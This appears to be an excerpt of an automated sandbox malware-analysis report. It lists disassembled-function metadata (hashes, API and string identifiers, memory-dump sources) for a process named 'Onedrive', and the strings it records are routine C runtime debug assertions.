                                                    • Opcode ID: 5c35f3dc112a50c0e805789c276cfb06d19a61249ce228f93abf104dd4fd02bb
                                                    • Instruction ID: 82dd3b61cd599625c522b5a77f4879d9edf91b14a8727d65d8204a060a61604e
                                                    • Opcode Fuzzy Hash: 5c35f3dc112a50c0e805789c276cfb06d19a61249ce228f93abf104dd4fd02bb
                                                    • Instruction Fuzzy Hash: 9C412B21B1C7C286E7609B22E460B7FB7A4EB80394F110135E6AE5AADDDF7DE544CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocSize
                                                    • String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
                                                    • API String ID: 3906553864-3244948836
                                                    • Opcode ID: 4c804e17fcf2b797cd3c9b60ca826f5f76968aea305c4a7878b56130db89205d
                                                    • Instruction ID: 6d6a053c0d1cc6121020296db4c5dd8d6600b64444d092c6e0de8131476b39f1
                                                    • Opcode Fuzzy Hash: 4c804e17fcf2b797cd3c9b60ca826f5f76968aea305c4a7878b56130db89205d
                                                    • Instruction Fuzzy Hash: 3C413D31A0CB8686E7109F26E464B6AB7B0FB84790F510136EAED5A7ECDF7CD4408B40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_unique_heap_ptr
                                                    • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$public_stream != nullptr
                                                    • API String ID: 2978586664-187094882
                                                    • Opcode ID: d9f09b24430cf7c905dcc77a9539ec568846fcd82fb5aab16ca27f9c7a20dcef
                                                    • Instruction ID: c10418ba016a37966bd079cf47ffdfedfd4f04b4413da366c5d9fcdc13242c7b
                                                    • Opcode Fuzzy Hash: d9f09b24430cf7c905dcc77a9539ec568846fcd82fb5aab16ca27f9c7a20dcef
                                                    • Instruction Fuzzy Hash: F6413F71B28A8192EB40DB11E471BAAB764FF80740F914236E6AE5B7EADF3CD544C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr_aligned_msize_heap_alloc
                                                    • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                                                    • API String ID: 4052397221-3183830673
                                                    • Opcode ID: ff1b9f30799f4ad0d9ac1bffd9bde8d84be0301351c13d166f628ec1fe1495ed
                                                    • Instruction ID: 6e25eb0644e1179c799b3161bdcbb5ba2af3722ccdda9ed57e7e2a3c6fc54155
                                                    • Opcode Fuzzy Hash: ff1b9f30799f4ad0d9ac1bffd9bde8d84be0301351c13d166f628ec1fe1495ed
                                                    • Instruction Fuzzy Hash: A1310E3271CB8585DB40DB16E4A1A6EB7A4FBC5B80F915032EA9D97BE9DF2CD540C700
                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECD4D
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECDA5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$CriticalEnterSection
                                                    • String ID: %ls$7$_CrtSetDbgFlag$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$new_bits == _CRTDBG_REPORT_FLAG || new_bits_have_only_valid_flags
                                                    • API String ID: 3216741998-3531600671
                                                    • Opcode ID: 98ef7632041a8fad0750eee4cc8ea17460eb30706e3ace5ef71840ebc1773ca3
                                                    • Instruction ID: 9b105078fd31bcebc54a5f98a4c559c9ba13bbe776f3da9c52de8aa98b4e9fa7
                                                    • Opcode Fuzzy Hash: 98ef7632041a8fad0750eee4cc8ea17460eb30706e3ace5ef71840ebc1773ca3
                                                    • Instruction Fuzzy Hash: 70415272B1C6428AE3509F26E465B6A7BA1EB81304F421235E5B95A6DDCF3DE584CF00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$_wcstombs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp$pwcs != nullptr
                                                    • API String ID: 0-287901994
                                                    • Opcode ID: 743646601bf834168527aa144c1fd2e5dc80d6afa19a0699e979b3519a2906be
                                                    • Instruction ID: 446074c7b8d37e9b39f8c1e553203c0cfadd4fa49067b4be396e9d1b5d473b51
                                                    • Opcode Fuzzy Hash: 743646601bf834168527aa144c1fd2e5dc80d6afa19a0699e979b3519a2906be
                                                    • Instruction Fuzzy Hash: 04121B7260CB8586D7708B16E4607AAB3A0F7847A4F554635EAED5BBE8DF3CD484CB00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$("Buffer too small", 0)$_wctomb_internal$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
                                                    • API String ID: 0-3614322479
                                                    • Opcode ID: 0f614ffcc1881ecedfdfa505c1d907f0ae2ecf116d141dd64fc1443b1e234b41
                                                    • Instruction ID: 43ec530a4db1c3ba098eeb76e529a64e2822fbc007ed79c075818acb403e18bf
                                                    • Opcode Fuzzy Hash: 0f614ffcc1881ecedfdfa505c1d907f0ae2ecf116d141dd64fc1443b1e234b41
                                                    • Instruction Fuzzy Hash: 12E13A32A0CBC285E7709B62E464BAAB3A0FB84754F514136D6AD5BADCDF7CD584CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-3177598755
                                                    • Opcode ID: 2903877c41504ff71dd7ac0ce2aa557120b8f1187956e46286f88ae249a88ae2
                                                    • Instruction ID: 6a26365cccde72dc051e8d9c1777bc18d809fbd0a618eae551dbaf1d18e594d8
                                                    • Opcode Fuzzy Hash: 2903877c41504ff71dd7ac0ce2aa557120b8f1187956e46286f88ae249a88ae2
                                                    • Instruction Fuzzy Hash: D9C13B2271CAC185E7609B26E4607BAB761FBC5784F410032EAAE5BBDEDF2DD444CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-3177598755
                                                    • Opcode ID: 9fcc800b697e66e5a2e00d7e63b0316d99a108fc15282cfc1420a90e1ce9cbd0
                                                    • Instruction ID: 1be5ee827dce094934a844f93fd3717d33913848af4dce9c76f9be48ddca175d
                                                    • Opcode Fuzzy Hash: 9fcc800b697e66e5a2e00d7e63b0316d99a108fc15282cfc1420a90e1ce9cbd0
                                                    • Instruction Fuzzy Hash: 6EC12B3271CA8185EB609B26E460BBEB761FBC5780F511032EA9D5BBDEDF2DD4448B40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-3177598755
                                                    • Opcode ID: 8c2f7f8cf4eb60a7f862857748a541016eaa27abcc5c4df5f5fa1067a4d7720e
                                                    • Instruction ID: 7ea3bd65ebc6131daa3db80390e0ddf4fd9abb488b73e1a5e8b9cb351353b0f1
                                                    • Opcode Fuzzy Hash: 8c2f7f8cf4eb60a7f862857748a541016eaa27abcc5c4df5f5fa1067a4d7720e
                                                    • Instruction Fuzzy Hash: DFC12C2271CA8185E760DB26E060BBEB761FBC1780F511032EA9E5BBDEDF2DD4458B40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-2041781485
                                                    • Opcode ID: 78b8b794c379b49e69a8979361e5dbb4b806ee50a32993ebf0ad29c2e8166d96
                                                    • Instruction ID: 6a72336cac73b8ea63d81f6af4b1956e49893bb2aff0facc60ef06f1978bf67c
                                                    • Opcode Fuzzy Hash: 78b8b794c379b49e69a8979361e5dbb4b806ee50a32993ebf0ad29c2e8166d96
                                                    • Instruction Fuzzy Hash: E0C13C2271DAC185E7609B26E4A07BAB761FBC5780F410032EADE5BBDECF2DD4458B40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-1003573884
                                                    • Opcode ID: b4f3e4260ec6d7b3d90b938558def7c2c3ed8f015c38342de67e4952101a5583
                                                    • Instruction ID: f81847f03bf7ac346139df7159e49f72bca89681799e87acf67ca3b2942f9dcd
                                                    • Opcode Fuzzy Hash: b4f3e4260ec6d7b3d90b938558def7c2c3ed8f015c38342de67e4952101a5583
                                                    • Instruction Fuzzy Hash: 53C13D2271CAC185E7609B26E0A07BEB761FBC5780F511032EA9E5BBDEDF2DD4458B40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-2041781485
                                                    • Opcode ID: 912e2437d91deac4f330579838eef85cc56769922d80ecc1edd5ef1b8bc710e0
                                                    • Instruction ID: 5ccafd5435897fa15ff4896456fb7cadc2c94b4c0a69e2473090783fc28b4485
                                                    • Opcode Fuzzy Hash: 912e2437d91deac4f330579838eef85cc56769922d80ecc1edd5ef1b8bc710e0
                                                    • Instruction Fuzzy Hash: 60C13C2271CAC185E7609B26E46077EB761FBC5780F411032EAAE5BBEEDF2DD4448B50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-1003573884
                                                    • Opcode ID: 308437765815ff5fef9f9c808688f9f617a22f9d268eaa4663d86ca56d1bbce6
                                                    • Instruction ID: 9ba8f77dedf15272d839d6e4e0f0b0c0ebc0d4c2a38fc674ad3d07a00a54e7f2
                                                    • Opcode Fuzzy Hash: 308437765815ff5fef9f9c808688f9f617a22f9d268eaa4663d86ca56d1bbce6
                                                    • Instruction Fuzzy Hash: 6FC13B2271CAC185E7609B26E4607BEB761FBC5780F410032EAAE5BBDECF2DD4458B50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-2041781485
                                                    • Opcode ID: 469e38d6eed64a1a91316f730531ced8dac0510bf6a3972017723c6cfb3396b6
                                                    • Instruction ID: 9c259c0a43ab01c86fea6d5b11b5eb05df59950a05637f1b87198960276ddcec
                                                    • Opcode Fuzzy Hash: 469e38d6eed64a1a91316f730531ced8dac0510bf6a3972017723c6cfb3396b6
                                                    • Instruction Fuzzy Hash: 63C12C2271CAC185E7609B26E4A07BEB761FBC5780F411032EA9E5BBDEDF2DD4458B40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DestroyException
                                                    • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 2436776299-1003573884
                                                    • Opcode ID: b9c71c7ffbedc175137bab90b96f82f8f806c00a84a48dc1ea6ce4bedb3eed6c
                                                    • Instruction ID: 1816620f485bf5609909c8cb62bf3ba3e6fb34a6ce36b3e5daee7decb64d0932
                                                    • Opcode Fuzzy Hash: b9c71c7ffbedc175137bab90b96f82f8f806c00a84a48dc1ea6ce4bedb3eed6c
                                                    • Instruction Fuzzy Hash: F1C12E2271DAC185E7609B26E4607BAB761EBC5780F410032EAEE5BBDEDF2DD444CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_
                                                    • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                    • API String ID: 2780765137-3439959449
                                                    • Opcode ID: 8fc302a938c663c038e340c4baeda506e803461af4fb7fee05b98ac1756c9dc9
                                                    • Instruction ID: f86399810837e7f0ad329960fa2b538389f8bdd32b1f411ff0f321e349281561
                                                    • Opcode Fuzzy Hash: 8fc302a938c663c038e340c4baeda506e803461af4fb7fee05b98ac1756c9dc9
                                                    • Instruction Fuzzy Hash: DFC1292260CB8586EB708B16F8647AAB3A0FB84744F511135E6AD9ABDDEF7CD544CF00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_
                                                    • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                    • API String ID: 2780765137-3439959449
                                                    • Opcode ID: c1ee4b9d8667413ed4f81e61ef1550aac306862adbeed06d7b0a525d6e872b36
                                                    • Instruction ID: 48aa24f2816663970ca931bd1eaa8da709706bc8474bb78a2f970b0ff9d98cca
                                                    • Opcode Fuzzy Hash: c1ee4b9d8667413ed4f81e61ef1550aac306862adbeed06d7b0a525d6e872b36
                                                    • Instruction Fuzzy Hash: 54C13932A1DA8185E7708B16E8647ABB3A0FB84354F511135E6AD9BAECEF3CD544CF00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: get_int64_arg
                                                    • String ID: %ls$("'n' format specifier disabled", 0)$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 1967237116-2589718845
                                                    • Opcode ID: 1571fae24718bc4f499a30154422bbf6e6c706c7d3a6b255a949ed42d7060a54
                                                    • Instruction ID: bb95407d11c54183b9b7cc189283d3e4703dd6e11728e6f1ae6287560e57ef5d
                                                    • Opcode Fuzzy Hash: 1571fae24718bc4f499a30154422bbf6e6c706c7d3a6b255a949ed42d7060a54
                                                    • Instruction Fuzzy Hash: 19712B32B1CB4296E7609B17F470A6A77A1FB85784F510031EAAD5B7ECDE7DD4818B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
